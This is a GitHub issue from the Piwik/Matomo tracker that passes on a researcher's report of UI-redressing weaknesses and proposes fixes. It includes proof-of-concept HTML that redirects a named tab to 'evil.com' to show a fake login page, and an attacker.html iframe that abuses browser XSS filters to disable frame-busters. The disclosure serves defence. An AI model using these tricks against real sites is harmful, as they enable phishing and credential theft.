Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add window.name= %buster% to prevent UI redressing #2966

Open
mattab opened this issue Feb 22, 2012 · 4 comments
Open

Add window.name= %buster% to prevent UI redressing #2966

mattab opened this issue Feb 22, 2012 · 4 comments
Labels
c: Security For issues that make Matomo more secure. Please report issues through HackerOne and not in Github. Task Indicates an issue is neither a feature nor a bug and it's purely a "technical" change.
Milestone
Backlog (Help wan...

Comments

@mattab
Copy link
Member

mattab commented Feb 22, 2012

This is a best practise/non critical issue, which was reported by Marcus Niemietz, a Web security researcher at the
Ruhr-University Bochum in Germany.

See the attached video for a demo of the hack. It requires a bit of user interaction.

Proof of Concept:
--------------------
<a
  target="public_handle"
  href="http://www.example.org">
    Example.org
</a>
<a
  href="#"
  onclick="window.open('//evil.com', 'public_handle'); return false;">
    Example.org
<a/>

By clicking on the first link (which is on attackers.org), there will 
be opened a window/tab with the name "public_handle" and the address
"example.org". Thus, there are for examples two tabs: One from the
attacker where the above code is (attackers.org), the other with the
Piwik installation (example.org). After clicking on the "example.org"
tab, the user will click on the tab of the attacker - for e.g. social
engineering reasons. By clicking on the second link, there will be
opened "evil.com" on the tab with the name "public_handle"; therefore,
the tab with "example.org" will change the address to "evil.com". The
user is looking on this tab now (with the name "public_handle") and
thinks: "Hey, I'm logged out. I will type in my username and
password." - but this is actually the web page of the attacker.

You can use such a line of JavaScript code to fix this issue:
<script type="text/javascript">>window.name="%TOKEN%";</script>

%TOKEN% should be a server-side randomly generated string. By using
this, an attacker cannot guess the name of the window. Furthermore, a
by the attacker specified name will be overwritten.

[...]

Beside that there is another thing that you can implement:
<script type="text/javascript">document.designMode='off';</script>

You can find more information about it in my paper
(http://ui-redressing.mniemietz.de/uiRedressing.pdf) on the pages 33
and 34. It can be used to deactivate (no frame buster will work) and
(not documented) inject JavaScript code.
@mattab
Copy link
Member Author

mattab commented Feb 22, 2012

Attachment: demo of non critical issue
piwik.avi

@robocoder
Copy link
Contributor

Maybe stick these js snippets into the iframe buster body template?

@mattab
Copy link
Member Author

mattab commented Feb 27, 2012

Another note from Marcus:



You should at the HTTP-Header "X-Xss-Protection: 0" to disable the XSS
filters of IE and Chrome. They can be used to deactivate e.g.
frame-buster in the following way:

victim.html:
---
<script type="text/javascript">
  if (parent.frames.length > 0){
    top.location.replace(document.location);
  }
</script>

attacker.html:
---
<iframe src="http://www.example.org/?xyz=%3Cscript%20type=%22
text/javascript%22%3Eif">
</iframe>

The same strategy can be used to deactivate "window.name" or
"designMode". Thus, you should add this header to gain a better
security.

@mattab
Copy link
Member Author

mattab commented Dec 14, 2012

If someone can submit a patch that would be appreciated.

@mattab mattab added this to the Future releases milestone Jul 8, 2014
@mattab mattab removed the P: normal label Aug 3, 2014
@mattab mattab modified the milestones: Long term, Mid term Dec 23, 2015
@mattab mattab modified the milestones: Long term, Mid term Dec 5, 2016
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
c: Security For issues that make Matomo more secure. Please report issues through HackerOne and not in Github. Task Indicates an issue is neither a feature nor a bug and it's purely a "technical" change.
Projects
None yet
Milestone
Backlog (Help wanted)
Development

No branches or pull requests
2 participants
@mattab @robocoder